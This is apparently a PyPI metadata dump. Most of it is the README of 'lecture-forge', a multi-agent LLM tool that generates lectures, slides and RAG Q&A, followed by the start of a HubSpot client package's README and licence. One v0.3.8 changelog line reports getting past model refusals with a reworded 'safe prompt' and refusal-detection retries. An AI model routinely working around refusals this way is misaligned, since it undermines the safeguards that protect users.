- **Unsplash**: [unsplash.com/developers](https://unsplash.com/developers) (free: 50 requests/hour)
### 3️⃣ Generate your first lecture
```bash
lecture-forge create
```
Enter the lecture details interactively and the lecture material is generated automatically! 🎉
---
## 💻 Usage
### Command overview
| Command | Description | Key options |
|--------|------|----------|
| **init** | Initial setup | `--path` |
| **create** | Generate a lecture | `--image-search`, `--quality-level` |
| **chat** | Q&A mode | `--knowledge-base` |
| **edit-images** | Edit images | `--output` |
| **improve** | Enhance a lecture | `--to-slides` |
| **cleanup** | Manage knowledge bases | `--all` |
| **home** | Open folders (v0.3.1+) | `outputs`, `data`, `kb`, `env` |
### Quick examples
```bash
# 🚀 Initial setup (only once, the first time)
lecture-forge init
# 🎓 Generate a lecture (interactive - simplest)
lecture-forge create
# 🎓 High-quality lecture (with image search)
lecture-forge create --image-search --quality-level strict
# 💬 Q&A mode (automatically picks the latest knowledge base)
lecture-forge chat
# 🎨 Convert to slides
lecture-forge improve outputs/lecture.html --to-slides
# 🖼️ Edit images
lecture-forge edit-images outputs/lecture.html
# 🧹 Clean up knowledge bases (interactive selection)
lecture-forge cleanup
# 📂 Open a folder (to inspect the generated lectures)
lecture-forge home outputs
```
### Command reference
#### 🚀 `init` - Initial setup
**Basic usage:**
```bash
lecture-forge init
```
An interactive wizard walks you through entering the API keys and creates the `.env` file automatically.
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--path PATH` | Use a custom directory | `--path /custom/path` |
**Default location:**
- **Windows**: `C:\Users\<username>\Documents\LectureForge\.env`
- **Mac/Linux**: `~/Documents/LectureForge/.env`
**Examples:**
```bash
# Use the default location (recommended)
lecture-forge init
# Use a custom directory
lecture-forge init --path /my/config/dir
# Create it in the current directory
lecture-forge init --path .
```
**What it does:**
1. Prompts for the required API keys (OpenAI, Serper)
2. Optionally configures the image APIs (Pexels, Unsplash)
3. Creates the `.env` file automatically
4. Fills in sensible default settings
5. Secures the file permissions (Unix/Mac)
---
#### 📚 `create` - Generate a lecture
**Basic usage:**
```bash
lecture-forge create
```
Enter the lecture details interactively and the lecture is generated automatically.
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--config FILE` | Use a YAML configuration file | `--config lecture.yaml` |
| `--image-search` | Enable web image search (Pexels/Unsplash) | `--image-search` |
| `--quality-level LEVEL` | Set the quality bar | `--quality-level strict` |
| `--output FILE` | Set the output filename | `--output my_lecture.html` |
| `--async-mode` | Use async I/O (70% faster, experimental) | `--async-mode` |
| `--include-pdf-images` | Include PDF images (not recommended; location-based matching works better) | `--include-pdf-images` |
**Quality levels:**
- `lenient` (70 points): quick draft
- `balanced` (80 points): default ✅
- `strict` (90 points): high quality
**Examples:**
```bash
# Default generation
lecture-forge create
# High quality + image search
lecture-forge create --image-search --quality-level strict
# Async mode (70% faster, experimental)
lecture-forge create --async-mode
# Use a YAML configuration file
lecture-forge create --config my_config.yaml
```
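This README does not spell out the YAML schema expected by `--config`. The fragment below is only a hypothetical illustration of what such a file might contain; every key name here is an assumption, so check `.env.example` and `lecture-forge create --help` for the real schema.

```yaml
# Hypothetical lecture.yaml - key names are illustrative, not the documented schema
topic: "Introduction to Neural Networks"
duration_minutes: 60
quality_level: balanced   # lenient | balanced | strict
image_search: true
```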
---
#### 💬 `chat` - Q&A mode
**Basic usage:**
```bash
lecture-forge chat
```
Automatically selects the most recent knowledge base.
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--knowledge-base PATH` | Use a specific knowledge base | `-kb ./data/vector_db/AI_xxx` |
**Interactive commands:**
- `/help`: show help
- `/exit`, `/quit`: quit
- `Ctrl+C`: force quit
**Examples:**
```bash
# Automatic selection
lecture-forge chat
# Use a specific knowledge base
lecture-forge chat -kb ./data/vector_db/lecture_20260209_123456
```
---
#### 🖼️ `edit-images` - Edit images
**Basic usage:**
```bash
lecture-forge edit-images outputs/lecture.html
```
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--output FILE` | Output file path | `-o outputs/edited.html` |
**Interactive commands:**
| Command | Description | Example |
|--------|------|------|
| `d <n>` | Delete image | `d 3` |
| `u <n>` | Undo deletion | `u 3` |
| `r <n>` | Replace image (vector DB search) | `r 5` |
| `s` | Save changes | `s` |
| `/exit`, `/quit` (or `q`) | Quit (without saving) | `/exit` |
| `h` | Help | `h` |
**Examples:**
```bash
# Default (saved as <original>_edited.html)
lecture-forge edit-images outputs/my_lecture.html
# Specify the output file
lecture-forge edit-images outputs/my_lecture.html -o outputs/final.html
```
---
#### 🎨 `improve` - Enhance a lecture
**Basic usage:**
```bash
lecture-forge improve outputs/lecture.html --to-slides
```
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--to-slides` | Convert to Reveal.js slides | `--to-slides` |
| `--with-notes` | Auto-generate per-slide speaker notes (LLM) | `--with-notes` |
| `--slide-rewrite` | LLM rewrite optimized for slides (no ellipses, ≤35 characters) | `--slide-rewrite` |
| `--enhance-pdf-images` | Add PDF image descriptions (legacy) | `--enhance-pdf-images` |
| `--source-pdf FILE` | Path to the source PDF (for legacy mode) | `--source-pdf doc.pdf` |
⚠️ **Note**: `--enhance-pdf-images` is a legacy feature. Since v0.2.0, location-based matching is applied automatically.
**Examples:**
```bash
# Convert to slides (basic)
lecture-forge improve outputs/lecture.html --to-slides
# Include speaker notes (press S in the browser)
lecture-forge improve outputs/lecture.html --to-slides --with-notes
# Slide-optimized rewrite (complete bullets with no ellipses)
lecture-forge improve outputs/lecture.html --to-slides --slide-rewrite
# Enhance PDF images (legacy)
lecture-forge improve outputs/lecture.html --enhance-pdf-images --source-pdf original.pdf
```
---
#### 🧹 `cleanup` - Manage knowledge bases
**Basic usage:**
```bash
lecture-forge cleanup
```
Interactively select the knowledge bases to delete.
**Options:**
| Option | Description | Example |
|------|------|---------|
| `--all` | Delete all knowledge bases (⚠️ careful!) | `--all` |
**Examples:**
```bash
# Interactive selection (safe)
lecture-forge cleanup
# Delete everything (cannot be undone!)
lecture-forge cleanup --all
```
### 📤 Output
After a lecture is generated, the following files are created:
```
outputs/
├── [topic]_[datetime].html          # 📄 HTML lecture material
└── [topic]_[datetime]_slides.html   # 🎬 Slides (with --to-slides)
data/
└── vector_db/
    └── [topic]_[datetime]/          # 🗄️ Knowledge base (for Q&A)
        ├── chroma.sqlite3
        └── ...
```
**What's included:**
- ✅ **HTML lecture material**: images, Mermaid diagrams, code highlighting, search index
- ✅ **Knowledge base**: ChromaDB vector DB (supports interactive Q&A)
- ✅ **Statistics**: quality score, token usage, estimated cost
- ✅ **Slides**: Reveal.js presentation (optional)
### 🔧 Advanced settings (.env file)
If you need more control, you can tune the following settings in the `.env` file:
```bash
# Search and crawling
SEARCH_NUM_RESULTS=20 # default: 10, max: 100
DEEP_CRAWLER_MAX_PAGES=30 # default: 10
DEEP_CRAWLER_MAX_DEPTH=3 # default: 2
# Images
IMAGE_SEARCH_PER_PAGE=15 # default: 10
MAX_IMAGES_PER_SEARCH=20 # default: 10
# Quality
QUALITY_THRESHOLD=90 # default: 80 (range 70-90)
MAX_ITERATIONS=5 # default: 3
# Performance
CHUNK_SIZE=800 # default: 1000 (smaller = more precise)
WEB_SCRAPER_TIMEOUT=60 # default: 30 seconds
```
💡 **Full list of settings**: see the `.env.example` file (15+ environment variables)
---
## 🖼️ Image Editing
You can interactively edit the images in a generated lecture.
### Features
- **Delete images**: remove unwanted images
- **Replace images**: automatically search the vector DB for alternatives and swap them in
- **Preview**: inspect the state of every image before applying changes
- **Safe saving**: the original is backed up and a new file is created
### Usage
```bash
# Start image editing mode
lecture-forge edit-images outputs/lecture.html
# Specify the output file
lecture-forge edit-images outputs/lecture.html -o outputs/lecture_v2.html
```
### Interactive commands
| Command | Description | Example |
|--------|------|------|
| `d <n>` | Delete image | `d 3` |
| `u <n>` | Undo deletion | `u 3` |
| `r <n>` | Replace image (search alternatives) | `r 5` |
| `s` | Save changes | `s` |
| `/exit`, `/quit` (or `q`) | Quit | `/exit` |
| `h` | Help | `h` |
### How it works
1. **HTML analysis**: extracts every image from the lecture file and collects its metadata
2. **Interactive editing**: shows the image list as a table for editing
3. **Alternative search**: suggests related images from the vector DB (RAG-based)
4. **Apply changes**: applies deletions/replacements in one batch and writes a new file
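The command grammar used in the interactive editor (`d 3`, `r 5`, `s`, ...) can be parsed with a few lines of Python. This is a hypothetical re-implementation for illustration only; the real parser lives in `image_editor.py` and may differ.

```python
def parse_edit_command(line: str):
    """Parse one edit-images style command; returns (action, arg) or None if invalid."""
    parts = line.strip().split()
    if not parts:
        return None
    cmd = parts[0].lower()
    # d/u/r take a 1-based image number
    if cmd in ("d", "u", "r") and len(parts) == 2 and parts[1].isdigit():
        action = {"d": "delete", "u": "undo", "r": "replace"}[cmd]
        return (action, int(parts[1]))
    # single-token commands: save, help, quit
    if cmd in ("s", "h", "q", "/exit", "/quit"):
        return (cmd, None)
    return None
```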
### Example
```
📸 Lecture image editing mode
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HTML: my_lecture.html
Total images: 25
┏━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━┓
┃  #  ┃ Description                     ┃ Section          ┃ Page ┃ Status    ┃
┡━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━┩
│  1  │ Neural network architecture     │ 1. Introduction  │ 5    │ Keep      │
│  2  │ Backpropagation diagram         │ 2. Core Concepts │ 12   │ 🗑️ Delete │
│  3  │ Training process flowchart      │ 2. Core Concepts │ 15   │ 🔄 Replace │
└─────┴─────────────────────────────────┴──────────────────┴──────┴───────────┘
Command: r 3
🔍 Searching for alternatives to image 3...
✅ Found 5 alternative images
Select: 1
✅ Image 3 scheduled for replacement
Command: s
💾 Changes saved: outputs/my_lecture_edited.html
```
---
## 🏗️ System Architecture
### Multi-agent pipeline (10 specialized agents)
```mermaid
flowchart TD
CLI["🖥️ CLI Interface<br/>input collection, progress, Q&A interaction"]
Orchestrator["⚙️ Pipeline Orchestrator<br/>agent coordination and task management"]
Phase12["📚 Phase 1-2<br/>Collection & Analysis"]
KB["🗄️ Knowledge Base<br/>Vector DB + RAG Caching"]
Phase34["✍️ Phase 3-4<br/>Generation & Quality QA"]
Output["📤 Output<br/>HTML + Slides"]
CLI --> Orchestrator
Orchestrator --> Phase12
Orchestrator --> KB
Phase12 -->|store| KB
KB -->|RAG Query| Phase34
Phase34 -->|RAG Query| KB
Phase34 --> Output
style CLI fill:#e1f5ff
style Orchestrator fill:#fff4e1
style Phase12 fill:#e8f5e9
style KB fill:#f3e5f5
style Phase34 fill:#fff9c4
style Output fill:#ffebee
```
### The 10 specialized agents
| # | Agent | Role | File |
|---|---------|------|------|
| 1 | **Content Collector** 📚 | Text collection and vectorization | content_collector.py |
| 2 | **Image Collector** 🖼️ | Image collection and Vision AI analysis | image_collector.py |
| 3 | **Content Analyzer** 🔍 | Content analysis and knowledge graph | content_analyzer.py |
| 4 | **Curriculum Designer** 📋 | Lecture structure design | curriculum_designer.py |
| 5 | **Content Writer** ✍️ | RAG-based content generation | content_writer.py |
| 6 | **Diagram Generator** 📊 | Mermaid diagram generation | diagram_generator.py |
| 7 | **Quality Evaluator** ✅ | Six-dimension quality evaluation | quality_evaluator.py |
| 8 | **Revision Agent** 🔄 | Automatic/semi-automatic revision | revision_agent.py |
| 9 | **Q&A Agent** 🤖 | Knowledge-base conversation (RAG caching) | qa_agent.py |
| 10 | **HTML Assembler** 🎨 | Final HTML assembly | html_assembler.py |
### The 9 tools
| # | Tool | Role | File |
|---|------|------|------|
| 1 | **PDF Parser** 📄 | PDF text extraction | pdf_parser.py |
| 2 | **Image Extractor** 🖼️ | PDF/HTML image extraction | image_extractor.py |
| 3 | **Web Scraper** 🌐 | Web page scraping | web_scraper.py |
| 4 | **Playwright Crawler** 🎭 | Dynamic web crawling | playwright_crawler.py |
| 5 | **Deep Web Crawler** 🕷️ | Multi-level web crawling (Hada.io) | deep_web_crawler.py |
| 6 | **Search Tool** 🔍 | Serper search API | search_tool.py |
| 7 | **Image Search** 🎨 | Pexels/Unsplash search | image_search.py |
| 8 | **PDF Image Describer** 📝 | GPT-4o Vision image descriptions | pdf_image_describer.py |
| 9 | **Image Editor** ✂️ | Interactive image editing | image_editor.py |
### Quality evaluation system (6 dimensions)
```mermaid
%%{init: {'theme':'base', 'themeVariables': { 'pie1':'#e8f5e9', 'pie2':'#bbdefb', 'pie3':'#fff9c4', 'pie4':'#f8bbd0', 'pie5':'#ffccbc', 'pie6':'#d1c4e9'}}}%%
pie title Quality evaluation weight distribution
"Content completeness (learning goals)" : 25
"Logical flow (cohesion)" : 20
"Difficulty fit (level)" : 20
"Visual quality (images)" : 15
"Time fit (volume)" : 10
"Technical accuracy (verification)" : 10
```
| Dimension | Weight | Criterion | Details |
|------|--------|----------|----------|
| 📝 Content completeness | **25%** | Achievement of learning goals | topic coverage, depth, examples |
| 🔗 Logical flow | **20%** | Cohesion between sections | structure, progression, coherence |
| 🎯 Difficulty fit | **20%** | Match with the audience level | terminology, complexity, prior knowledge |
| 🖼️ Visual quality | **15%** | Sufficiency of images/diagrams | relevance, quality, placement |
| ⏱️ Time fit | **10%** | Lecture length vs. volume | word count, density, pacing |
| ✅ Technical accuracy | **10%** | Fact verification | code, concepts, terminology |
**Passing bar**: 80 points or higher (automatic iterative improvement, up to 3 rounds)
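The weighted overall score implied by the table can be reproduced with simple arithmetic. This is only a sketch of the scoring rule; the actual internals of `quality_evaluator.py` may differ.

```python
# Weights from the 6-dimension table above (they sum to 1.0)
WEIGHTS = {
    "content_completeness": 0.25,
    "logical_flow": 0.20,
    "difficulty_fit": 0.20,
    "visual_quality": 0.15,
    "time_fit": 0.10,
    "technical_accuracy": 0.10,
}

def overall_score(scores: dict) -> float:
    # Each dimension is scored 0-100; the weighted sum is the overall score
    return sum(WEIGHTS[k] * scores[k] for k in WEIGHTS)

def passes(scores: dict, threshold: float = 80.0) -> bool:
    # Below the threshold, up to MAX_ITERATIONS improvement rounds run
    return overall_score(scores) >= threshold
```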
---
## ❓ FAQ
### Installation and setup
<details>
<summary><b>Q: Which Python version do I need?</b></summary>
A: **Python 3.11, 3.12, and 3.13 are all supported.**
- ✅ Python 3.11: fully supported (recommended)
- ✅ Python 3.12: fully supported (v0.3.3+)
- ✅ Python 3.13: supported (v0.3.8+, verified)
```bash
# Check your version
python --version
# Create a Python 3.11 environment (recommended)
conda create -n lecture-forge python=3.11
conda activate lecture-forge
pip install lecture-forge
```
</details>
<details>
<summary><b>Q: Are API keys required?</b></summary>
A:
- **Required**: OpenAI API, Serper API
- **Optional**: Pexels API, Unsplash API (for image search)
Without the image APIs the tool still works using PDF/web images only.
</details>
<details>
<summary><b>Q: How much does it cost?</b></summary>
A: **Measured cost** (as of v0.2.4+):
- 60-minute lecture: about **$0.035**
- 180-minute lecture: about **$0.105**
(Using GPT-4o-mini. Conservative theoretical estimate: $0.22 per 180 minutes.)
The exact cost is shown after generation completes.
</details>
<details>
<summary><b>Q: How do I change the .env settings?</b></summary>
A: Open the `.env` file and edit the values you want:
```bash
# Increase the number of search results
SEARCH_NUM_RESULTS=20
# Widen the crawling scope
DEEP_CRAWLER_MAX_PAGES=30
# Increase the timeout
WEB_SCRAPER_TIMEOUT=60
```
Changes take effect the next time you run the tool.
</details>
### Usage
<details>
<summary><b>Q: Can I use it offline?</b></summary>
A:
- **During generation**: APIs are required (OpenAI, Serper, etc.)
- **After generation**: the HTML file and knowledge base work offline
- **Chat mode**: the knowledge base works offline, but the LLM API is still required
</details>
<details>
<summary><b>Q: What is the difference between quality levels?</b></summary>
A:
| Level | Threshold | Use | Time |
|------|--------|------|------|
| `lenient` | 70 points | quick draft | short |
| `balanced` | 80 points | **default** ✅ | medium |
| `strict` | 90 points | high-quality production | long |
If the threshold is not met, up to 3 automatic improvement rounds run.
</details>
<details>
<summary><b>Q: How do I exit chat mode?</b></summary>
A: Use one of:
- `/exit` or `/quit` (recommended)
- `Ctrl+C` (force quit)
</details>
<details>
<summary><b>Q: What if images are not matched correctly?</b></summary>
A: The location-based matching introduced in v0.2.0 runs automatically:
1. PDF images: 85% automatic matching (page-based)
2. Web images: keyword-based fallback
3. Manual editing: replace images with `lecture-forge edit-images`
</details>
### Technical questions
<details>
<summary><b>Q: How do I run the tests?</b></summary>
```bash
# Full test suite
pytest tests/ -v
# With coverage
pytest tests/ --cov=lecture_forge --cov-report=html
# A specific test
pytest tests/unit/agents/test_content_writer.py -v
# Agents only
pytest tests/unit/agents/ -v
```
</details>
<details>
<summary><b>Q: What happens if an API call fails?</b></summary>
A: Automatic **retry** has been built in since v0.2.0:
- Up to 3 retries
- Exponential backoff: 2s → 4s → 10s
- Transient errors recover automatically
- Covers OpenAI, Serper, Pexels, and Unsplash
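The retry behavior described above can be approximated with a small stdlib helper. This is an illustrative sketch, not the project's actual code (the project reportedly uses a shared `make_api_retry()` factory in `utils/retry.py`).

```python
import time

def call_with_retry(fn, max_attempts=3, delays=(2, 4, 10)):
    """Retry a flaky call using the backoff schedule described above (2s -> 4s -> 10s)."""
    for attempt in range(max_attempts):
        try:
            return fn()
        except Exception:
            if attempt == max_attempts - 1:
                raise  # give up after the final attempt
            time.sleep(delays[min(attempt, len(delays) - 1)])
```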
</details>
<details>
<summary><b>Q: How does RAG query caching work?</b></summary>
A:
- The query and result count are hashed with MD5 and cached in memory
- Identical questions get a **60% faster response**
- Cache hit/miss statistics are tracked automatically
- The cache lives for the session (cleared when the process exits)
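Based on the description above, the cache key is an MD5 hash of the query text plus the requested result count. A minimal sketch follows; the helper names and exact key format are assumptions, not the library's actual API.

```python
import hashlib

_rag_cache = {}  # in-memory, lives for the session only

def cache_key(query: str, n_results: int) -> str:
    # MD5 over the query text and the requested result count
    raw = f"{query}|{n_results}".encode("utf-8")
    return hashlib.md5(raw).hexdigest()

def cached_query(query: str, n_results: int, run_query):
    key = cache_key(query, n_results)
    if key not in _rag_cache:            # cache miss: hit the vector DB
        _rag_cache[key] = run_query(query, n_results)
    return _rag_cache[key]               # cache hit: served from memory
```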
</details>
<details>
<summary><b>Q: How do I use different settings per environment?</b></summary>
A: Keep a separate `.env` file per environment:
```bash
# Development
.env.development
# Production
.env.production
# Switch
cp .env.production .env
lecture-forge create
```
</details>
---
## 📝 Changelog
### v0.3.8 (2026-02-20) - 🧠 RMC self-review
- 🧠 **RMC (Reflective Meta-Cognition)** applied to 3 agents (two-stage self-review: Layer 1 review + Layer 2 review-of-the-review)
- `CurriculumDesigner._review_with_rmc()`: auto-corrects section difficulty ordering, learning-goal coverage, and prerequisite ordering
- `ContentWriter._review_content_with_rmc()`: semantic review and revision of conceptual leaps, broken flow, and duplication
- `QAAgent._review_answer_with_rmc()`: classifies each claim as ✓/~/✗ → removes or flags hallucinated items
- 🐛 Fixed LLM refusal responses on conclusion/introduction sections: safe prompt + refusal-pattern detection with automatic retry
- 🐛 Fixed `--with-notes` Mermaid arrow encoding bug (`-->` arrows being HTML-escaped) (`SlideNotesGenerator`)
- ✅ Verified full dependency compatibility with Python 3.13
### v0.3.7 (2026-02-18) - 🖼️ UI & slide improvements
- 🖼️ **Lightbox**: click an image or Mermaid diagram in the lecture HTML to enlarge it in a full-screen modal
- 🔍 **Search improvements**: Lunr.js → substring search (full support for mixed Korean/English)
- 📊 **Full-width Mermaid**: ~300px → ~1180px on slides (`width: 100%`)
- 🐛 Mermaid 10 API fix: `contentLoaded()` → `mermaid.run()`, `startOnLoad: false`
### v0.3.6 (2026-02-18) - 🔧 Code quality & stability
- 🐛 Fixed `BaseAgent.temperature=0.0` falsy bug
- 🐛 `QAAgent` hardcoded path → `Config.USER_CONFIG_DIR`
- 🔧 `utils/retry.py`: `make_api_retry()` shared factory (removed 4 duplicated copies)
- 🏗️ `BaseImageSearchTool`: extracted Unsplash/Pexels shared logic (~100 lines removed)
- ⚙️ RAG parameters configurable via environment variables: `RAG_QA_N_RESULTS`, `RAG_QA_TOP_K`, `RAG_CONTENT_N_RESULTS`
- ✅ Config validation: `IMAGE_WEIGHT_*` and `CONTENT_*_RATIO` sums validated to equal 1.0
- 💬 Chat responses saved to `conversation_log.txt` (both questions and AI answers)
- 🧪 Added 23 async tool tests
### v0.3.5 (2026-02-18) - 🎯 Major RAG quality improvements
- 🎯 **Structured 400-word answers**: 5 mandatory Markdown sections (overview/details/key points/examples/further considerations)
- 🔍 **Stronger retrieval**: n_results 10→15, top_k 8→12 (+50%), up to 3 chunks per source page
- 🌡️ temperature 0.7→0.3 (better accuracy), Rich Markdown panel rendering
- 🐛 Fixed ChromaDB L2 confidence bug: `1 - distance` → `max(0, 1 - distance/2)` (fixes the permanent 0%)
- 🔧 `pkg_resources.path` → `importlib.resources.files()` (removes a Python 3.11+ deprecation)
### v0.3.4 (2026-02-16) - ⚡ Async I/O support
- ⚡ **AsyncContentCollectorAgent**: parallel PDF/URL/search processing (70% faster)
- 🌐 **Async tools**: httpx-based web scraper, Serper search, rate limiting
- 🚀 `--async-mode` CLI flag (experimental), 100% compatible with the existing sync path
### v0.3.3 (2026-02-15) - ⌨️ Input system improvements
- ⌨️ **prompt-toolkit adopted**: full Korean/multibyte support, working backspace/arrow keys
- 📜 Input history (`chat_history.txt`), ↑/↓ navigation, Ctrl+R search
- 💡 Auto-suggestions (based on previous questions), editing shortcuts (Ctrl+A/E, Alt+←/→)
- 🔧 NumPy 1.26.0+ (official Python 3.12 support)
### v0.3.2 (2026-02-14) - 🌐 Multilingual support
- 🌐 **Automatic language detection**: per-chunk language detection (langdetect)
- 🔍 **Cross-lingual dual query**: Korean questions also search English documents (automatic translation)
- 🎯 Intelligent re-ranking: same-language priority + cross-lingual bonus
- 🛠️ Migration tool for existing vector DBs (`migrate_add_language_metadata.py`)
### v0.3.1 (2026-02-13) - 📂 User-friendly directories
- 📂 `~/.lecture-forge/` (hidden) → `~/Documents/LectureForge/` (regular folder)
- 🏠 Added `home` command: quick access to `outputs`, `data`, `kb`, `env`
- 🔄 Automatic migration: existing data moved automatically (backward compatible)
### v0.3.0 (2026-02-12) - 🎯 Presentation optimization
- 🎯 Items per slide 4→3, long lists split automatically (max 5 per slide)
- 🎨 Layered heading sizes/colors, typography tuning, visual depth on code blocks
- 📊 Text diagrams → Mermaid (architecture, exception hierarchy, quality evaluation)
- 🎯 Exception handling system (9 categories) + template-based prompt management
### v0.2.6 (2026-02-12) - 🐛 Image bug fix
- 🐛 Fixed `pil_image.thumbnail()` mutating the original → analyze a `pil_image.copy()` instead
- Symptom: every PDF image was saved at 200px width → original dimensions now fully preserved
### v0.2.1–0.2.5 (2026-02-10~12) - Bug fixes and quality improvements
- 🐛 Fixed visual score, quality evaluation, and slide generation bugs
- 🎨 Full HD images in high-quality WebP, IMAGE_MIN_WIDTH raised to 500
### v0.2.0 (2026-02-09) - 🚀 Enhanced Quality Release
- ⚡ RAG query caching (60% faster), automatic API retries (exponential backoff)
- 🧪 77+ unit tests, type hint coverage 40% → 75%
- 🔧 Config refactoring: removed all hardcoded values, 15+ environment-variable-based settings
### v0.1.0 (2026-02-08) - 🎉 Initial Release
- 10 specialized agents, multi-source collection (PDF, URL, search)
- Location-based image matching (+750%), ChromaDB knowledge base
- 6-dimension quality evaluation, HTML output, Reveal.js slide conversion
---
## 🤝 Contributing
Contributions are welcome! Please follow these steps:
1. **Open an issue**: discuss the change first
2. **Fork & branch**: create a feature branch
3. **Write tests**: add tests for new functionality
4. **Submit a PR**: include a description of the change
See `CONTRIBUTING.md` for details.
---
## 📄 License
MIT License - see [LICENSE](LICENSE) for details
---
## 📞 Support and Contact
- **Issue tracker**: [GitHub Issues](https://github.com/bullpeng72/Lecture_forge/issues)
- **Project guide**: [CLAUDE.md](CLAUDE.md)
- **Technical analysis**: [INPUT_LIMITS_ANALYSIS.md](docs/INPUT_LIMITS_ANALYSIS.md)
- **Testing guide**: [tests/README.md](tests/README.md)
---
## 🙏 Acknowledgements
This project builds on the following open-source projects:
- [LangChain](https://github.com/langchain-ai/langchain) - multi-agent framework
- [ChromaDB](https://github.com/chroma-core/chroma) - vector database
- [OpenAI](https://openai.com) - GPT-4o models
- [Serper](https://serper.dev) - search API
- [Pexels](https://pexels.com) & [Unsplash](https://unsplash.com) - image APIs
---
<p align="center">
<b>Made with ❤️ by Sungwoo Kim</b><br>
⭐ If this project helped you, please give it a GitHub star!
</p>
| text/markdown | Sungwoo Kim | Sungwoo Kim <sungwoo.kim@gmail.com> | null | null | MIT License
Copyright (c) 2026 LectureForge Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| ai, education, lecture, langchain, multiagent, multilingual, rag | [
"Development Status :: 4 - Beta",
"Intended Audience :: Education",
"Topic :: Education",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | https://github.com/bullpeng72/Lecture_forge | null | >=3.11 | [] | [] | [] | [
"langchain<0.4.0,>=0.3.27",
"langchain-openai<0.4.0,>=0.2.0",
"langchain-core<0.4.0,>=0.3.76",
"openai<2.0.0,>=1.12.0",
"chromadb<2.0.0,>=1.1.0",
"pymupdf<2.0.0,>=1.23.0",
"beautifulsoup4<5.0.0,>=4.12.0",
"requests<3.0.0,>=2.31.0",
"pillow<11.0.0,>=10.2.0",
"numpy<2.0.0,>=1.26.0",
"scipy<2.0.0,>=1.11.0",
"jinja2<4.0.0,>=3.1.3",
"markdown<4.0.0,>=3.5.0",
"pygments<3.0.0,>=2.17.0",
"click<9.0.0,>=8.1.7",
"rich<14.0.0,>=13.7.0",
"rich-click<2.0.0,>=1.7.0",
"prompt-toolkit<4.0.0,>=3.0.0",
"python-dotenv<2.0.0,>=1.0.0",
"pydantic<3.0.0,>=2.5.0",
"pyyaml<7.0.0,>=6.0.1",
"tenacity<9.0.0,>=8.0.0",
"langdetect<2.0.0,>=1.0.9",
"httpx<1.0.0,>=0.24.0",
"pytest>=7.4.0; extra == \"dev\"",
"pytest-cov>=4.1.0; extra == \"dev\"",
"pytest-mock>=3.11.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"black>=23.7.0; extra == \"dev\"",
"flake8>=6.1.0; extra == \"dev\"",
"mypy>=1.5.0; extra == \"dev\"",
"pylint>=2.17.0; extra == \"dev\"",
"bandit>=1.7.5; extra == \"dev\"",
"safety>=2.3.0; extra == \"dev\"",
"pre-commit>=3.3.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/bullpeng72/Lecture_forge"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:34:07.408334 | lecture_forge-0.3.8.tar.gz | 279,783 | 34/b1/6a183db1bc22371965c589ffbdde34b9a2f698a478039b9443b7167687c0/lecture_forge-0.3.8.tar.gz | source | sdist | null | false | 264732172cb36dfc2f8c4d6097fb7180 | 415a0b29004b74365d5d0f3bedc8674d18ffd8336db50ae59fb9809628dc87c6 | 34b16a183db1bc22371965c589ffbdde34b9a2f698a478039b9443b7167687c0 | null | [
"LICENSE"
] | 218 |
2.4 | s6r-hubspot | 1.0.17 | Hubspot API client | # s6r-hubspot
## Installation
```bash
pip install s6r-hubspot
```
## Usage
```python
from s6r_hubspot import HubspotConnection
hubspot = HubspotConnection('your_access_token')
owners = hubspot.get_owners()
```
### Unit tests
To run the unit test file, set the token of an empty HubSpot account in an environment variable named
`HUBSPOT_TOKEN`:
```bash
export HUBSPOT_TOKEN='your_token'
```
## License
This project is licensed under the [GNU Lesser General Public License (LGPL) Version 3](https://www.gnu.org/licenses/lgpl-3.0.html).
## Contributing
Contributions are welcome! If you find any issues or have suggestions for improvements,
please open an issue or submit a pull request.
- GitHub Repository: [ScalizerOrg/s6r-hubspot](https://github.com/ScalizerOrg/s6r-hubspot)
## Contributors
* David Halgand - [GitHub](https://github.com/halgandd)
* Morgane Goujon - [GitHub](https://github.com/MorganeGoujon)
* Khalid Bentaleb - [GitHub](https://github.com/kbentaleb)
* Michel Perrocheau - [GitHub](https://github.com/myrrkel)
## Maintainer
This software is maintained by [Scalizer](https://www.scalizer.fr).
<div style="text-align: center;">
[](https://www.scalizer.fr)
</div>
| text/markdown | null | Michel Perrocheau <michel@scalizer.fr> | null | null | GNU LESSER GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
This version of the GNU Lesser General Public License incorporates
the terms and conditions of version 3 of the GNU General Public
License, supplemented by the additional permissions listed below.
0. Additional Definitions.
As used herein, "this License" refers to version 3 of the GNU Lesser
General Public License, and the "GNU GPL" refers to version 3 of the GNU
General Public License.
"The Library" refers to a covered work governed by this License,
